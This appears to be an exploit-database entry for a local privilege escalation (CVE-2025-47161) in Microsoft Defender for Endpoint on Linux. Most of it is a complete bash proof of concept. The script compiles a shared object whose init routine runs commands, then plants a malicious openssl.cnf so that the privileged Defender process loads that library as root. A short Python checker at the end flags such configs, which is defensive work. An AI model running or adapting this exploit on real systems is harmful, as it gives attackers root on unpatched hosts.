Microsoft Defender for Endpoint (MDE) – Elevation of Privilege

Exploit Details

Basic Information

Exploit Title: Microsoft Defender for Endpoint (MDE) – Elevation of Privilege
Exploit ID: EDB-ID:52355
Type: exploitdb
Published: 2025-07-08T00:00:00
Modified: 2025-07-08T00:00:00

CVSS Information

CVSS Score: 7.8
Severity: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-47161

Exploit Code

#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) – Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link: https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
#
# Vendor Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#

echo "MDE Version: $(mdatp version)"

# stage: write the shared object source to disk
cat > mde-exp.c <<EOF
/*
 * Build procedure:
 * gcc -fPIC -o woot.o -Wall -c woot.c
 * gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs as the library's init routine (-Wl,-init,woot) when the .so is loaded */
void woot(){
    // for manual testing
    if(isatty(STDERR_FILENO)) {
        fprintf(stderr,"Woot!\n");
    }
    system("ps -ef > /woot.txt");
    sleep(3000000);
}
EOF

# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

# stage the OpenSSL config at the path the vulnerable build reads it from
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf <<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF

echo "Checking every 15 seconds for /woot.txt"
while true
do
    if [[ -f /woot.txt ]]
    then
        echo "WOOT – /woot.txt exists"
        ls -ld /woot.txt
        exit
    fi
    sleep 15
done
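As an added defender-side check, not part of the PoC above: parse an openssl.cnf the way the staged file is laid out (openssl_conf -> engines -> per-engine dynamic_path) and flag a config file, or an engine library, that lives under a user-writable directory. The prefix list and the embedded sample config are assumptions constructed for this example.

```python
import configparser
import os

# Assumed list of locations an unprivileged user can populate; a root process
# should never load its OpenSSL configuration or engine shared objects from them.
UNTRUSTED_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm", "/home")

# Constructed sample with the same shape as the openssl.cnf staged by the PoC above.
MALICIOUS_CNF = """\
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
"""

def _under_untrusted(path):
    # Normalise first so "/tmp/../etc/x" is judged by where it really resolves.
    norm = os.path.normpath(path)
    return any(norm == p or norm.startswith(p + "/") for p in UNTRUSTED_PREFIXES)

def dynamic_engine_paths(text):
    """Every dynamic_path in an engine section reachable from openssl_conf."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                  # openssl.cnf keys are case-sensitive
    cp.read_string("[_global]\n" + text)  # top-level keys precede any [section]
    init = cp["_global"].get("openssl_conf", "")
    engines = cp[init].get("engines", "") if cp.has_section(init) else ""
    if not cp.has_section(engines):
        return []
    return [cp[sec]["dynamic_path"].strip() for sec in cp[engines].values()
            if cp.has_section(sec) and "dynamic_path" in cp[sec]]

def audit_openssl_cnf(cnf_path, text):
    """Findings: config under a user-writable dir, or an engine loaded from one."""
    findings = []
    if _under_untrusted(cnf_path):
        findings.append("config file under user-writable path: " + cnf_path)
    for so in dynamic_engine_paths(text):
        if _under_untrusted(so):
            findings.append("dynamic engine loaded from user-writable path: " + so)
    return findings
```

Run audit_openssl_cnf over every openssl.cnf a privileged agent can be made to read; two findings on the staged path above, none on /etc/ssl/openssl.cnf with a provider-only config.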
